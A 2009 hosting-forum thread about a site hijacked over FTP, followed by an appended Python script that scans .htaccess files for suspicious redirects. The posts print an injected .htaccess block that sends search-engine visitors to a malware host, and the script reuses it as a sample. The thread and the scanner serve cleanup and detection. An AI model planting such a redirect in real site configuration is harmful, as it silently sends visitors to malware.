Listed as an attack site

Discussion in 'Linux VPS/Dedicated - cPanel' started by jamesp57, Feb 12, 2009.

  1. jamesp57

    jamesp57 New Member

    I just found out that Google has listed my forum as an attack site. It appears someone from the IP address 89.28.13.202 has cloned the website address or something.

    If you google http://4x4sonthe.net and then click on the link, it will alert you to a virus or malware site.

    Anyone have this happen to their website? Is there an easy way to clear this up?
     
  2. ppc

    ppc Moderator

  3. jamesp57

    jamesp57 New Member

    Google's webmaster help guide isn't the easiest to navigate but I did find this in the .htaccess file

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

    It's the redirect to the malware site.

    I'm not an expert at programming so any help here would be appreciated.
     
  4. Dan

    Dan Moderator

    Hello James,

    So is that one of your IPs? Did you put that redirect in?

    If not then obviously take it out and change your password ASAP as it would appear that your domain's been compromised. If there isn't anything in the .htaccess that you put in there then you can simply delete the file.
     
  5. jamesp57

    jamesp57 New Member

    That isn't one of my IPs. I deleted all of this:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

    but left the rest of the file. I found out from the support guys that someone from a Russian IP address hacked into the site. I changed the password to something a lot more difficult. I'm also changing passwords on all the other sites I manage and placed a ban on 89.* and 94.*.
     
  6. rezag

    rezag New Member

    If it is known, and without giving out details of course, I am curious to know what is meant by hacked? What was the entry point?
     
  7. jamesp57

    jamesp57 New Member

    Someone from the IP address of 94.188.36.46 was able to FTP into my website. In doing so they installed a redirect into several .htaccess files throughout the site. I guess my password wasn't secure enough.

    From what I have seen and read, this is a common problem.

    http://www.google.com/support/forum/p/Webmasters/search?hl=en&q=malware
     
  8. DesotoD

    DesotoD New Member

    I am having extreme problems with this very same issue. It appears to be mostly Joomla sites that are being hacked but I have seen it on some other installations. I'd block the IPs but they just seem to get a new one.
     
  9. Dan

    Dan Moderator

    Hello, Desoto

    If they are getting into your machine the same way (FTP) then you need to change your passwords else they'll just keep coming back. In the OP's case his .htaccess was being changed and that will not make any difference as to the content on the site.
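
The redirect block posted in this thread turned up in several .htaccess files across the site, so cleaning one file is not enough. As an added example (not part of the original thread), this Python script walks a document root and reports every RewriteRule that sends visitors to a foreign host only when the Referer matches; the function names and the `own_hosts` parameter are this example's own, and `SAMPLE` is the thread's block shortened to two conditions.

```python
import os
import re

# Referer-testing RewriteCond (group 1: pattern) and a RewriteRule whose
# substitution is an absolute URL (group 1: URL, group 2: host).
COND_REFERER = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_EXTERNAL = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://([^/\s:?]+)\S*)", re.I)
DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s", re.I)

# The block posted in this thread, shortened to two of its conditions.
SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
"""


def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target_url, referer_patterns) per suspicious RewriteRule."""
    own = {h.lower() for h in own_hosts}
    findings, referers = [], []
    for no, line in enumerate(text.splitlines(), 1):
        kind = DIRECTIVE.match(line)
        if not kind:
            continue  # comments, blank lines, unrelated directives
        if kind.group(1).lower() == "rewritecond":
            cond = COND_REFERER.match(line)
            if cond:
                referers.append(cond.group(1))
            continue
        rule = RULE_EXTERNAL.match(line)
        if rule and referers and rule.group(2).lower() not in own:
            findings.append((no, rule.group(1), referers))
        referers = []  # conditions only apply to the next RewriteRule
    return findings

def scan_docroot(root, own_hosts=()):
    """Check every .htaccess under root (assumed to be the site's web root)."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, errors="replace") as fh:
                found = find_referer_redirects(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits

if __name__ == "__main__":
    print(find_referer_redirects(SAMPLE))
```

Pass the site's own domains in `own_hosts` so that redirects the owner configured between their own hosts are not reported.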

     
